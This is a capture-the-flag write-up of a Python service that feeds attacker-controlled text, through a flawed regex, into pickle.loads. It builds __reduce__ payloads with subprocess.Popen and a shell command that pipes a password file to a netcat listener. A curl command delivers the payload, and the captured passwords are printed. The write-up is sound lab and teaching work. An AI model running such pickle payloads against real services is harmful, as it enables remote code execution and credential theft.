Warning The pickle module is not intended to be secure against erroneous or
maliciously constructed data. Never unpickle data received from an untrusted or
unauthenticated source.
This is not an idle warning - pickle
can be used to execute nearly arbitrary
code. It is possible to use pickle
securely, but it requires a high level of
paranoia about the data being processed. At first blush, the deserialize
method
doesn't appear to unpickle user data. The only data we control should be the
portion matched by the data: (.*?);
part of the regex. That's where the second
red flag comes in: we can clearly inject data into the job: (.*?)
match group
when we clearly aren't meant to be able to. Demonstration:
>>> data = "realdata; job: fakejob"
>>> direction = "RESULT"
>>> job = "realjob"
>>> serialized = """type: %s; data: %s; job: %s""" % (direction, data, pickle.dumps(job))
>>> parser = re.compile('^type: (.*?); data: (.*?); job: (.*?)$', re.DOTALL)
>>> match = parser.match(serialized)
>>> match.group(2)
'realdata'
>>> match.group(3)
"fakejob; job: S'realjob'\np0\n."
Oops, whatever we pass after ; job: will get passed directly to pickle.loads,
which is just what the docs told us not to allow! So let's look at how you actually
exploit pickle. A pickled string is actually a program in a self-contained
stack-based programming language, so it's possible to learn that language and
write your exploit directly in it. That's a pain, so fortunately there's a shortcut:
when dumping an object, pickle will look for a method called __reduce__, and use
its return value to construct the string. The return value is meant to be
something callable and a tuple of arguments to that callable thing, in a
particular format. Here's an example:
import subprocess
class Echo(object):
    def __reduce__(self):
        return (subprocess.Popen, (('echo', 'blah'),))
import pickle
>>> x = Echo()
>>> pickle.dumps(x)
"csubprocess\nPopen\np0\n((S'echo'\np1\nS'blah'\np2\ntp3\ntp4\nRp5\n."
>>> pickle.loads(_)
blah
That's actually not the scary part. In a completely new python instance on any machine with a python interpreter, I can now do:
>>> import pickle
>>> pickle.loads("csubprocess\nPopen\np0\n((S'echo'\np1\nS'blah'\np2\ntp3\ntp4\nRp5\n.")
That string is a self-contained echo-er anywhere I can manage to get it into a
pickle.loads
call. To underscore the point by putting things together:
import pickle
import re
>>> data = "realdata; job: csubprocess\nPopen\np0\n((S'echo'\np1\nS'blah'\np2\ntp3\ntp4\nRp5\n."
>>> direction = "RESULT"
>>> job = "realjob"
>>> serialized = """type: %s; data: %s; job: %s""" % (direction, data, pickle.dumps(job))
>>> parser = re.compile('^type: (.*?); data: (.*?); job: (.*?)$', re.DOTALL)
>>> match = parser.match(serialized)
>>> match.group(3)
>>> pickle.loads(match.group(3))
blah
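The snippets above are Python 2. For anyone following along on Python 3, here is a harmless sketch of the same __reduce__ mechanism. The class name Demo and the choice of len as the callable are mine, picked so that nothing is executed beyond a builtin:

```python
import pickle

class Demo:
    def __reduce__(self):
        # (callable, args): pickle.loads will call len("blah") on the other side.
        return (len, ("blah",))

blob = pickle.dumps(Demo())

# The receiving side needs no knowledge of Demo at all; it just runs the call.
result = pickle.loads(blob)
print(result)  # prints: 4
```

Swap len for something like subprocess.Popen and the receiver runs a command instead, which is exactly the problem.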
Ok, now that we know we can inject behavior into the server using a bad regex and
pickle
, we can start thinking about how to take advantage of it. It seems like
the least fussy thing to do is to send the password over the local network. The
nc
tool is great for stuff like this. Let's play around with it a bit:
$ nc -l 127.0.0.1 12345 &
[2] 9513
$ nc 127.0.0.1 12345 < /home/level05/.password
WNWfdC5eWkIM
Pretty straightforward - we set up a background process listening on a port and
then send some data through that port, which gets printed by the listening process.
We don't quite have it in the format we need it in to work with subprocess.Popen
because < /home/level05/.password
isn't a normal command argument. What we need
is to send the entire command as an argument to the shell binary itself:
$ nc -l 127.0.0.1 12345 &
[2] 9527
$ /bin/sh -c "nc 127.0.0.1 12345 < /home/level05/.password"
WNWfdC5eWkIM
Now we're just executing a single program with two arguments. Here's our pickle
exploiting stub:
import subprocess
class NcPassword(object):
    def __reduce__(self):
        return (subprocess.Popen, (('/bin/sh', '-c', 'nc 127.0.0.1 12345 < /home/level05/.password'),))
This generates this payload:
"csubprocess\nPopen\np0\n((S'/bin/sh'\np1\nS'-c'\np2\nS'nc 127.0.0.1 12345 < /home/level05/.password'\np3\ntp4\ntp5\nRp6\n."
Which works as expected:
$ nc -l 127.0.0.1 12345 &
[2] 9552
$ python
>>> import pickle
>>> pickle.loads("csubprocess\nPopen\np0\n((S'/bin/sh'\np1\nS'-c'\np2\nS'nc 127.0.0.1 12345 < /home/level05/.password'\np3\ntp4\ntp5\nRp6\n.")
WNWfdC5eWkIM
At this point it's almost too easy - we change the path in our payload to point
to /home/level06/.password, start our listener, and post to the service with the
payload after ; job: like so:
$ nc -l 127.0.0.1 12345 &
$ curl 127.0.0.1:9020 -d "`echo -e "; job: csubprocess\nPopen\np0\n((S'/bin/sh'\np1\nS'-c'\np2\nS'nc 127.0.0.1 12345 < /home/level06/.password'\np3\ntp4\ntp5\nRp6\n."`"
18aRISxV3MUS
{
"result": "Job timed out"
}
Ohai password.